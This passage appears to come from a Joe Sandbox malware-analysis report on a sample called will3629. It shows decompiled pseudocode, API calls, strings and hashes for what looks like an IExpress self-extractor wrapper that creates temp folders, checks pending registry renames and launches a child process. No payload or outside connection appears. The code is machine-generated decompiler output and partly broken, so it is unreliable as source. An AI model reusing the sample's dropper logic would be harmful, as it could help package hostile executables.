Part of subcall function 00AC53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5402
Part of subcall function 00AC53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC541F
Part of subcall function 00AC53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC542B
Part of subcall function 00AC53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5434

Strings

ppc, xrefs: 00AC54E9
i386, xrefs: 00AC54FE
alpha, xrefs: 00AC54F0
mips, xrefs: 00AC54F7
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC547D, 00AC5481, 00AC54AB, 00AC551C, 00AC553C, 00AC5568

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3388087672
Opcode ID: f313f87ca06fd3b0a843cd1f7867843372ee8bd920013f6e3dfe4a7c11b82d9d
Instruction ID: 32f52e4863755af401ab460e0d8796cd9a927a20bcf225d8837f95b1dd162740
Opcode Fuzzy Hash: f313f87ca06fd3b0a843cd1f7867843372ee8bd920013f6e3dfe4a7c11b82d9d
Instruction Fuzzy Hash: 2D310A71F00A085BCB14DBB59D45F7F77EBBB91344F1B012EB40692251DB74DE828691

Uniqueness

Uniqueness Score: -1.00%

Function 00AC256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00AC256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00AC24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00ac2572
0x00ac2573
0x00ac2575
0x00ac2578
0x00ac257d
0x00ac2627
0x00ac2583
0x00ac2586
0x00ac2589
0x00ac25eb
0x00ac2607
0x00000000
0x00ac2609
0x00ac261a
0x00000000
0x00ac261a
0x00000000
0x00ac258b
0x00ac258b
0x00ac259e
0x00ac25b2
0x00ac25ba
0x00ac25cb
0x00ac25d1
0x00ac25d6
0x00ac25da
0x00ac25dd
0x00ac25dd
0x00ac25e3
0x00ac25e3
0x00ac25e3
0x00ac258b
0x00ac2589
0x00ac262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00AC4096,00AC4096,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?), ref: 00AC25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00AC4096,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?,00AC4096), ref: 00AC25CB
RegCloseKey.KERNELBASE(?,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?,00AC4096), ref: 00AC25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00AC4096,00AC4096,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?), ref: 00AC25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00AC4096,00000000,00000000,00000000,00000000,?,00AC1ED3,00000001,00000000), ref: 00AC261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00AC25F5
System\CurrentControlSet\Control\Session Manager, xrefs: 00AC25A8
PendingFileRenameOperations, xrefs: 00AC25C3

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 5187fc1e69bc1d9db7cd39e7e2a12aa8327bd7f3dc20cf363a188e7da9c78488
Instruction ID: 96caaa8eccc07b831d1930d034ae1ba762df96a95b81623c1d79c7ad5da0da86
Opcode Fuzzy Hash: 5187fc1e69bc1d9db7cd39e7e2a12aa8327bd7f3dc20cf363a188e7da9c78488
Instruction Fuzzy Hash: 3A118F35A0222CBBAB20DB919C0DFFBBE7CEF117A5F124059B809A2000DA344E45D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00AC7155();
				_push(0x58);
				_push(0xac72b8);
				E00AC7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xac88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xac88b0; // 0x2
						if(__eflags != 0) {
							 *0xac81e4 = _t58;
							goto L13;
						} else {
							 *0xac88b0 = _t58;
							_t37 = E00AC6C3F(0xac10b8, 0xac10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00AC6FF4();
						L13:
						_t68 =  *0xac88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xac10b4);
							_push(0xac10ac);
							L00AC7202();
							 *0xac88b0 = 2;
						}
						if(_t53 == 0) {
							 *0xac88ac = 0;
						}
						_t71 =  *0xac88b4;
						if( *0xac88b4 != 0 && E00AC7060(_t71, 0xac88b4) != 0) {
							_t60 =  *0xac88b4; // 0x0
							 *0xaca288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00AC2BFB(0xac0000, 0, _t59); // executed
							 *0xac81e0 = _t30;
							__eflags =  *0xac81f8;
							if( *0xac81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xac81e4;
							if( *0xac81e4 == 0) {
								__imp___cexit();
								_t30 =  *0xac81e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00AC724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00ac6a60
0x00ac6a6a
0x00ac6a6c
0x00ac6a71
0x00ac6a78
0x00ac6a7f
0x00ac6a85
0x00ac6a8e
0x00ac6a91
0x00ac6a93
0x00ac6a9c
0x00ac6aa2
0x00000000
0x00000000
0x00ac6aa6
0x00ac6ab4
0x00000000
0x00ac6aa8
0x00ac6aaa
0x00ac6aab
0x00ac6aab
0x00ac6abf
0x00ac6abf
0x00ac6ac5
0x00ac6ad1
0x00ac6ad7
0x00ac6b05
0x00000000
0x00ac6ad9
0x00ac6ad9
0x00ac6ae9
0x00ac6af0
0x00ac6af2
0x00000000
0x00ac6af4
0x00ac6af4
0x00ac6afb
0x00ac6afb
0x00ac6af2
0x00ac6ac7
0x00ac6ac7
0x00ac6ac9
0x00ac6b0b
0x00ac6b0b
0x00ac6b11
0x00ac6b13
0x00ac6b18
0x00ac6b1d
0x00ac6b24
0x00ac6b24
0x00ac6b30
0x00ac6b39
0x00ac6b39
0x00ac6b3b
0x00ac6b42
0x00ac6b57
0x00ac6b5f
0x00ac6b65
0x00ac6b65
0x00ac6b67
0x00ac6b6c
0x00ac6b6e
0x00ac6b71
0x00ac6b74
0x00ac6b74
0x00ac6b79
0x00000000
0x00000000
0x00ac6b7d
0x00ac6b81
0x00000000
0x00000000
0x00ac6b83
0x00ac6b8c
0x00ac6b8d
0x00ac6b90
0x00ac6b90
0x00ac6b83
0x00ac6b81
0x00ac6b94
0x00ac6b98
0x00ac6ba2
0x00ac6b9a
0x00ac6b9a
0x00ac6b9a
0x00ac6ba3
0x00ac6bab
0x00ac6bb0
0x00ac6bb5
0x00ac6bbc
0x00ac6bbf
0x00000000
0x00ac6bbf
0x00ac6c1e
0x00ac6c25
0x00ac6c27
0x00ac6c2d
0x00ac6c2d
0x00ac6c32
0x00000000
0x00ac6bc5
0x00ac6bc5
0x00ac6bc8
0x00ac6bcc
0x00ac6bce
0x00ac6bce
0x00ac6bd1
0x00ac6bd3
0x00ac6bd3
0x00ac6bd6
0x00ac6bda
0x00ac6be1
0x00ac6be3
0x00ac6be5
0x00ac6be5
0x00ac6be6
0x00ac6be6
0x00ac6be9
0x00ac6bea
0x00ac6bea
0x00ac6b74
0x00ac6c39
0x00ac6c3e
0x00ac6c3e
0x00ac6abe
0x00ac6abe
0x00000000

APIs

Part of subcall function 00AC7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AC7182
Part of subcall function 00AC7155: GetCurrentProcessId.KERNEL32 ref: 00AC7191
Part of subcall function 00AC7155: GetCurrentThreadId.KERNEL32 ref: 00AC719A
Part of subcall function 00AC7155: GetTickCount.KERNEL32 ref: 00AC71A3
Part of subcall function 00AC7155: QueryPerformanceCounter.KERNEL32(?), ref: 00AC71B8

GetStartupInfoW.KERNEL32(?,00AC72B8,00000058), ref: 00AC6A7F
Sleep.KERNEL32(000003E8), ref: 00AC6AB4
_amsg_exit.MSVCRT ref: 00AC6AC9
_initterm.MSVCRT ref: 00AC6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00AC6B49
exit.KERNELBASE ref: 00AC6BBF
_ismbblead.MSVCRT ref: 00AC6BDA

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 687b4268e958ae1a85e04ebfd286331deadce06844e2c056c08e8bcf5abc8ea6
Instruction ID: 85fe7617c472b2f762c388de8b826c33784854215e4b54bb1e4bded2bcbf6731
Opcode Fuzzy Hash: 687b4268e958ae1a85e04ebfd286331deadce06844e2c056c08e8bcf5abc8ea6
Instruction Fuzzy Hash: 8B41C1719882259BDB21DBA8DD05FBA77F4FB44760F17412EE841E7291CF784C428B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00AC58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00AC1680(_t20, _t36, _t33);
					E00AC658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0xac9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0xac9124 = E00AC6285();
					_t14 = 0;
				}
				return _t14;
			}

0x00ac58cd
0x00ac58d1
0x00ac58d3
0x00ac58d5
0x00ac58d8
0x00ac58d8
0x00ac58da
0x00ac58db
0x00ac58e1
0x00ac58ed
0x00ac58f1
0x00ac591e
0x00ac592c
0x00ac5943
0x00ac594a
0x00ac594d
0x00ac5953
0x00ac5959
0x00000000
0x00ac595b
0x00ac595c
0x00ac5963
0x00ac596c
0x00000000
0x00ac5972
0x00ac5974
0x00ac597a
0x00ac597a
0x00ac596c
0x00ac58f3
0x00ac5901
0x00ac5906
0x00ac590b
0x00ac5910
0x00ac5910
0x00ac5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5943
LocalFree.KERNEL32(00000000,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC594D
CloseHandle.KERNEL32(00000000,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00AC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5963

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC58CD, 00AC58CF, 00AC5919, 00AC5962
TMP4351$.TMP, xrefs: 00AC5923

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
API String ID: 747627703-3451089282
Opcode ID: 10843a1c1153c386876259a5376fd3ec5e3713f93a5fd95ea9f9b95c8ec813c0
Instruction ID: f43505a9c1469fe0b67833a684fb1731466c8c9b64289f5c5bb5e5a8f9a3aa14
Opcode Fuzzy Hash: 10843a1c1153c386876259a5376fd3ec5e3713f93a5fd95ea9f9b95c8ec813c0
Instruction Fuzzy Hash: 0E112671B006146BC7249FBA5C4DFAB7E99EF8A364B160659F506D3181CA70984686A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00AC3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0xac8004; // 0xc32e3ded
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00AC6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0xac9124 = E00AC6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E00AC44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0xac8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0xac9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0xac9a2c = _t44;
						}
					}
				}
				E00AC411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0xac9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00ac3fef
0x00ac3ffa
0x00ac4001
0x00ac4008
0x00ac400a
0x00ac400b
0x00ac4010
0x00ac410a
0x00ac411a
0x00ac411a
0x00ac401c
0x00ac401d
0x00ac401e
0x00ac401f
0x00ac4033
0x00ac403b
0x00ac40ca
0x00ac40e9
0x00ac40f8
0x00ac4101
0x00ac4106
0x00ac4106
0x00ac4108
0x00ac4108
0x00000000
0x00ac4108
0x00ac4049
0x00ac405c
0x00ac4062
0x00ac4068
0x00ac406e
0x00ac4070
0x00ac4077
0x00ac407f
0x00ac4089
0x00ac408b
0x00ac408b
0x00ac4089
0x00ac4077
0x00ac4091
0x00ac409c
0x00ac40a8
0x00ac40b8
0x00000000
0x00ac40c2
0x00000000
0x00ac40c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00AC4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AC4049
GetExitCodeProcess.KERNELBASE ref: 00AC405C
CloseHandle.KERNEL32(?), ref: 00AC409C
CloseHandle.KERNEL32(?), ref: 00AC40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00AC40DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00AC40E9

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 0eac62b6d62a9c6ab2d61d592a76adf3f094cedb6bb6e0c2db703696c977db61
Instruction ID: 1a9065d776a429bb560bfdffe96307d67e66c9a7b75416ecdf4e32abff0044ed
Opcode Fuzzy Hash: 0eac62b6d62a9c6ab2d61d592a76adf3f094cedb6bb6e0c2db703696c977db61
Instruction Fuzzy Hash: FE31C23168021CABEB20DBA5DC4DFBB777CEBA8744F1202ADF545D2161CA344D82CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00AC51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E00AC468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E00AC468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E00AC44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0xac9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0xac9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0xac9124 = 0x80070714;
					goto L10;
				}
				E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xac9124 = E00AC6285();
				goto L10;
			}

0x00ac51fb
0x00ac5207
0x00ac520b
0x00ac523c
0x00ac5268
0x00ac5270
0x00ac528b
0x00ac5293
0x00ac529c
0x00ac52a6
0x00ac52b0
0x00000000
0x00ac52b0
0x00ac529e
0x00ac5279
0x00000000
0x00ac527b
0x00ac5273
0x00000000
0x00ac5273
0x00ac524a
0x00ac5250
0x00ac5256
0x00000000
0x00ac5256
0x00ac5219
0x00ac5223
0x00000000

APIs

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00AC2F4D,?,00000002,00000000), ref: 00AC5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00AC5250

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285

Strings

UPROMPT, xrefs: 00AC51EF, 00AC5230
<None>, xrefs: 00AC5262

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 3fe15988c82bd2b00648e72ef6bf96e9eb404b6b4ec0b9fcad7ff46ef644c9b8
Instruction ID: 0a0a48e803b9407346c27d30807ecc695a9b80c47840f4012c034fdea17b6cab
Opcode Fuzzy Hash: 3fe15988c82bd2b00648e72ef6bf96e9eb404b6b4ec0b9fcad7ff46ef644c9b8
Instruction Fuzzy Hash: 371108B1B00A05AFE354ABB15E5AF7B61DDDB99384F17442DF602E5190DB789C024228

Uniqueness

Uniqueness Score: -1.00%

Function 00AC52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00AC52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0xac8004; // 0xc32e3ded
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0xac91e0; // 0x2eb7b60
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0xac8a24 == 0 &&  *0xac9a30 == 0) {
